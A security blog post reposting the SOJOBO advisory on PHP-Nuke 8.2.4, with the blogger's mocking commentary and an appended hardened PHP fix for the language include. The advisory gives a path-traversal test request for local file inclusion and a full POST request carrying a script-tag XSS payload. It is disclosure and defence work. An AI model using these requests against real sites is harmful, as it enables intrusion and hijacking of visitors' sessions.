K8拉登哥哥's Blog

K8搞基大队 [K8team]: information security, network security, 0day vulnerabilities, penetration testing, hacking
PHP-Nuke 8.2.4 file inclusion vulnerability: total nonsense, it includes .php files

2013-11-28 17:18:26 | Category: Web_0day | Tags: (none)


The PHP versions where path truncation works were something like 4.x up to before 5.0, I don't remember exactly; in any case it has been a long time since I ran into one where truncation actually succeeded.
Earlier, someone in China posted a so-called inclusion 0day for ecshop 2.7.3 after its local file inclusion vulnerability had been fixed; they all look the same, they include a .php file. All I can say is: ha ha.
Damn it, isn't this nonsense? If you cannot truncate the path, you are forced to upload a PHP script, and if you can upload a PHP script it already gets parsed directly.
So what the hell do you need local inclusion for? Are there really that many idiots? What, someone says you can leave a backdoor this way; idiot, you would be better off leaving an image, or that other function, whatever it is called, is even stealthier.


[SOJOBO-ADV-13-04] - PHP-Nuke 8.2.4 multiple vulnerabilities


I. * Information *
==================
Name : PHP-Nuke 8.2.4 multiple vulnerabilities
Software : PHP-Nuke 8.2.4 and possibly below.
Vendor Homepage : http://www.phpnuke.org/
Vulnerability Type : File Inclusion and Reflected Cross-Site Scripting
Severity : High (4/5)
Advisory Reference : SOJOBO-ADV-13-04 (http://www.enkomio.com/Advisories)
Credits: Sojobo dev team
Description: A File Inclusion and Reflected Cross Site Scripting vulnerability was discovered during the testing of Sojobo, Static Analysis Tool.


II. * Details *
===============
A) File Inclusion in mainfile.php [Impact: 4/5]


Follow a trace to reach the vulnerable code.


File: /html/index.php
15: require_once("mainfile.php");


File: /html/mainfile.php
90: if (!ini_get('register_globals')) {
91:  @import_request_variables("GPC", "");
...
274: if ((isset($newlang)) AND (stristr($newlang,"."))) {
275:  if (file_exists("language/lang-".$newlang.".php")) {
...
277:   include_once("language/lang-".$newlang.".php");  <- damn it, isn't this nonsense? It includes a .php file


Due to a call to the function 'import_request_variables' it is possible to create the variable $newlang with an arbitrary value and to allow the inclusion of an arbitrary local file.


A test request is: /index.php?newlang=/../../index


B) Reflected Cross Site Scripting in index.php (of module Your_Account) [Impact: 3/5]


Follow a trace to reach the vulnerable code.


File: /html/mainfile.php
90: if (!ini_get('register_globals')) {
91:  @import_request_variables("GPC", "");


File: /html/modules/Your_Account/index.php
758: function logout() {
769: if (!empty($redirect)) {
770: echo "<META HTTP-EQUIV=\"refresh\" content=\"3;URL=modules.php?name=$redirect\">";


Due to a call to the function 'import_request_variables' it is possible to create the variable $redirect with an arbitrary value and to inject arbitrary HTML code. Due to XSS filtering the request must be done via POST with the injection data sent as payload.


An HTTP POST test request is:


POST /html/modules.php?name=Your_Account&op=logout HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.example.com/html/index.php
Cookie: lang=english;
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 59


redirect="><script src="http://www.example.com/xss.html" />


III. * Report Timeline *
========================


18 November 2013 - Advisory released, unable to contact the vendor.


IV. * About Sojobo *
====================
Sojobo allows you to find security vulnerabilities in your PHP web application source code before others do.
By using the state of the art techniques Sojobo is able to identify the most critical vulnerabilities in your code
and limit the number of false positives.
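As an added example, not code from PHP-Nuke or from the Sojobo advisory, here is a hardened replacement for the $newlang handling quoted in section A: the language name is read explicitly from $_GET instead of being conjured by import_request_variables(), and it is checked against a strict pattern and an allow-list before anything reaches include_once(). The language/lang-<name>.php layout is taken from the advisory; the allow-list contents are constructed for the example.

```php
<?php
// Added example (not PHP-Nuke's code): hardened $newlang handling.
// Assumes language files live in language/lang-<name>.php (as quoted in
// the advisory). The allow-list below is constructed for this example.

declare(strict_types=1);

// Installed language names; constructed for the example.
const ALLOWED_LANGS = ['english', 'german', 'chinese'];

/**
 * Resolve a user-supplied language name to a safe include path, or null.
 * Only a bare identifier from the allow-list is accepted, so "../",
 * absolute paths, null bytes and other tricks never reach include_once(),
 * regardless of whether the PHP version still truncates long paths.
 */
function resolveLangFile(?string $newlang, string $langDir = 'language'): ?string
{
    if ($newlang === null) {
        return null;
    }
    // Shape check first: lowercase letters, digits and underscore only.
    if (!preg_match('/\A[a-z0-9_]{1,32}\z/', $newlang)) {
        return null;
    }
    // Then the allow-list: the name must be one we actually ship.
    if (!in_array($newlang, ALLOWED_LANGS, true)) {
        return null;
    }
    $path = $langDir . '/lang-' . $newlang . '.php';
    return is_file($path) ? $path : null;
}

// Read the parameter explicitly instead of relying on
// register_globals or import_request_variables().
$requested = isset($_GET['newlang']) ? (string) $_GET['newlang'] : null;
$langFile  = resolveLangFile($requested);

if ($langFile !== null) {
    $currentlang = $requested;
    include_once $langFile;
} else {
    // Safe default when the parameter is missing or rejected.
    $currentlang = 'english';
}
```

With this check the advisory's test value `/../../index` is rejected by the pattern before the allow-list is even consulted, and a rejected request falls back to the default language rather than producing an error or an include.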